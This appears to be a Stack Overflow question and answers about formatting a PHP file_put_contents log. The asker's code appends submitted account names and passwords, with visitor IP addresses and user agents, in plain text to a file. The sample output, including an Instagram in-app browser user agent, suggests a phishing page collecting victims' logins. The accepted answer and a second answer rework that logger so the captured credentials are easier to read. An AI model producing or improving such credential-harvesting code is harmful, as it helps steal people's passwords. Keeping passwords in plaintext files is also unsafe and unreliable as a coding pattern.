# PHP file_put_contents - How to organize the output?

Tags: php, output

I have this code below:

```
file_put_contents("ceontent.txt", "Account: " . $_POST['callcenteragent'] . " Pass: " . $_POST['agentpassword'] . " IP: " . $ipaddress . " User-agent: " . $browser . " \n", FILE_APPEND);
```

The output going to be:

```
Account: Michael Pass: Michaelpwd122@@ IP: 197.210.55.69
 User-agent: Mozilla/5.0 (Linux; Android 6.0; TECNO W5 Lite Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 Instagram 150.0.0.33.120 Android (23/6.0; 320dpi; 720x1280; TECNO; TECNO W5 Lite; W5Lite; mt6580; en_US; 230877674)
```

It's kinda a mess and i can't read.

How to make it look like this:

```
    ====================================================================================
    ====================================================================================
    Account: Michael
    Password: Michaelpwd122@@
    IP: 197.210.55.69
    User-Agent: Mozilla/5.0 (Linux; Android 6.0; TECNO W5 Lite Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 Instagram 150.0.0.33.120 Android (23/6.0; 320dpi; 720x1280; TECNO; TECNO W5 Lite; W5Lite; mt6580; en_US; 230877674) 
    ===================================================================================
    ===================================================================================
```

I've tried to add "=====================" but somehow its not put content.

Any help please? Thank you in advance.

Answer (score 2, accepted):

```
$separator = '===============================================';
$data = [
    $separator,
    $separator,
    "Account: " . $_POST['callcenteragent'],
    "Pass: " . $_POST['agentpassword'],
    "IP: " . $ipaddress,
    "User-agent: " . $browser,
    $separator,
    $separator,
];

file_put_contents("ceontent.txt", implode("\n", $data), FILE_APPEND);
```

Comment: consider the cleaning suggestion in the next answer for security. Using $_POST directly is not a good practice

Comment: it's work perfectly and thanks to Gabriel but it's not necessary to use array and join. you can put your texts in a single string variable such as $text = "text\text 2";. actually you're complicated your simple code with complicate codes

Comment: Yes, I know. I just like arrays over concatenate strings. I'm curious which is faster (concatenate strings perhaps) but array solution looks better. And more easy to handle. if required.

Comment: @GabrielA.LópezLópez the best coding is simple codes. it's not necessary to complicating your simple codes with many features of your programming language. actually you misled the OP and if he is new to programming world, maybe he think is necessary to use arrays for concatenates. anyway thanks for your kind

Comment: @praser its not necessary to  use arrays and `implode` function to concatenate strings. You can do it as in the answer by @amirali-esteki with the `.=` operator. Different ways for the same thing

Answer (score 1):

for writing new lines in html, you should use *****BR***** tag or tags that make own new line after closing them such as h(1|2|3|4|5|6), p and ...

but for writing new line character in files you can use \n that maked for creating new lines in texts

in php you can use new line character by 3 way:

1: Put your texts in double quotation and use \n character (such as another languages):

```
$text = "amirali esteki answered the user:\npra sar";
echo('<pre>' . $text . '\</pre>');
```

---

2: use chr function that is for generate a single-byte string from a number. the single-byte number of new line character is ten (10):

```
$text = 'amirali esteki answered the user:' . chr(10) . 'pra sar';
echo('<pre>' . $text . '\</pre>');
```

---

3: use PHP_EOL constant that defined for new character by PHP:

```
$text = 'amirali esteki answered the user:' . PHP_EOL . 'pra sar';
echo('<pre>' . $text . '\</pre>');
```

---

and about your code:

```
$text = '====================================================================================' . PHP_EOL;
$text .= '====================================================================================' . PHP_EOL;
$text .= 'Account: ' . $_POST['callcenteragent'] . PHP_EOL;
$text .= 'Password: ' . $_POST['agentpassword'] . PHP_EOL;
$text .= 'IP: ' . $ipaddress . PHP_EOL;
$text .= 'User-agent: ' . $browser . PHP_EOL;
$text .= '====================================================================================' . PHP_EOL;
$text .= '====================================================================================' . PHP_EOL;
file_put_contents('ceontent.txt', $text, FILE_APPEND);
```

---

*****Note:***** please make sure your codes be safe against hackers attacks. certainly you should use a XSS clean method or function for safing received data from clients and methods